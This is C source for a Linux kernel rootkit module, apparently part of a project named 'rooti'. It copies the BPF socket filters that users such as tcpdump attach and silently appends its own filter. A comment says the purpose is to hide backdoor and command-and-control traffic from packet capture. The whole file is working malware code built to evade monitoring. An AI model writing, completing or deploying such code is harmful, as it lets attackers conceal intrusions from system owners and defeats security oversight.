#include <linux/socket.h>
#include <linux/filter.h>
#include "traffic.h"
#include "../../utils.h"

struct sock_filter icmp_filter_code[] = {
    { 0x28, 0, 0, 0x0000000c },
    { 0x15, 0, 3, 0x00000800 },
    { 0x30, 0, 0, 0x00000017 },
    { 0x15, 0, 1, 0x00000001 },
    { 0x6, 0, 0, 0x00040000 },
    { 0x6, 0, 0, 0x00000000 },
};

/*
    Fixup for the relative offsets of the 'true' branch of the conditional jump instructions in the first program.
    This is done to account for the added instructions in between the first program and the ret instructions in the end.
*/
static void rooti_fixup_jmp_offsets(struct sock_fprog_kern *filter_program, loff_t program_offset)
{
    for (int i = 0; i < program_offset; i++) {
        if (BPF_CLASS(filter_program->filter[i].code) != BPF_JMP) {
            continue;
        }
        // TODO: handle jumps of more than 255 instructions
        filter_program->filter[i].jf += program_offset - 2;
    }
}

/*
    Concatenate two source BPF filter programs into one by ANDing the filters they represent.
    Saves the result into the filter 'dst_program' which is heap-allocated and should be freed later.

    TODO: this basic implementation only supports the common case of BPF programs generated by libpcap
    in which there's always a pattern with two ret instructions in the end. Also it doesn't account for the case
    of tcpdump with no filter. In the future this function support all possible legal BPF programs.
*/
static int rooti_concat_filter_programs(struct sock_fprog_kern *src_program1, struct sock_fprog_kern *src_program2,
                                        struct sock_fprog_kern *dst_program)
{
    // The offset in the program at which the first program stops and the second one starts.
    // Subtracting from the length the two ret instructions of the first program which are overwritten
    loff_t program_offset = src_program1->len - 2;
    
    dst_program->len = program_offset + src_program2->len;
    dst_program->filter = kcalloc(dst_program->len, sizeof(struct sock_filter), GFP_KERNEL);
    if (dst_program->filter == NULL) {
        ROOTI_DEBUG("failed to allocate memory");
        return -ENOMEM;
    }

    memcpy(dst_program->filter, src_program1->filter, bpf_classic_proglen(src_program1));
    memcpy(dst_program->filter + program_offset, src_program2->filter, bpf_classic_proglen(src_program2));

    rooti_fixup_jmp_offsets(dst_program, program_offset);

    ROOTI_DEBUG("complete filter:");
    for (int i = 0; i < dst_program->len; i++) {
        ROOTI_DEBUG("{ 0x%x, 0x%x, 0x%x, 0x%x },",
            dst_program->filter[i].code,
            dst_program->filter[i].jt,
            dst_program->filter[i].jf,
            dst_program->filter[i].k
        );
    }

    return 0;
}

/* 
    Copies the userspace BPF filter program pointed to by 'fprog_ptr' into the parallel kernelspace structure.
    The filter of the kernel structure is heap-allocated and should be freed later.
*/
int rooti_copy_user_fprog(struct sock_fprog_kern *user_fprog_kernel, sockptr_t fprog_ptr, int fprog_len)
{
    struct sock_fprog user_fprog;
    size_t user_program_size;
    int err;

    err = copy_bpf_fprog_from_user(&user_fprog, fprog_ptr, fprog_len);
    if (err) {
        ROOTI_DEBUG("copy_bpf_fprog_from_user() failed: %d", err);
        return err;
    }

    user_fprog_kernel->len = user_fprog.len;
    user_fprog_kernel->filter = kcalloc(user_fprog_kernel->len, sizeof(struct sock_filter), GFP_KERNEL);
    if (user_fprog_kernel->filter == NULL) {
        ROOTI_DEBUG("failed to allocate memory");
        return -ENOMEM;
    }

    user_program_size = bpf_classic_proglen((&user_fprog));
    err = copy_from_user(user_fprog_kernel->filter, user_fprog.filter, user_program_size);
    if (err) {
        ROOTI_DEBUG("copy_from_user() failed: %d", err);
        return -EFAULT;
    }

    return 0;
}

/*
    This function attaches additional cBPF filters (which are specifyed in the rootkit's configuration)
    to the filters specified by the user. This is used to conceal certain network traffic that we wish to hide,
    such as backdoor traffic or communication with C&C.
*/
int rooti_inject_traffic_filter(struct sock *sock, struct sock_fprog_kern *user_filter_program)
{
    ROOTI_RESOLVE_FUNC_ADDR(__sk_attach_prog, -EINVAL, int, struct bpf_prog *, struct sock *);
    
    struct sock_fprog_kern kern_filter_program = {
        .filter = icmp_filter_code,
        .len = ARRAY_SIZE(icmp_filter_code)
    };

    struct sock_fprog_kern complete_filter_program;
    struct bpf_prog *bpf_program;
    int err;

    err = rooti_concat_filter_programs(user_filter_program, &kern_filter_program, &complete_filter_program);
    if (err) {
        return err;
    }

    err = bpf_prog_create(&bpf_program, &complete_filter_program);
    if (bpf_program == NULL) {
        ROOTI_DEBUG("bpf_prog_create() failed %d", err);
        return err;
    }

    err = ____sk_attach_prog(bpf_program, sock);
    if (err) {
        bpf_prog_destroy(bpf_program);
        ROOTI_DEBUG("__sk_attach_prog() failed: %d", err);
        return err;
    }

    kfree(complete_filter_program.filter);

    return 0;
}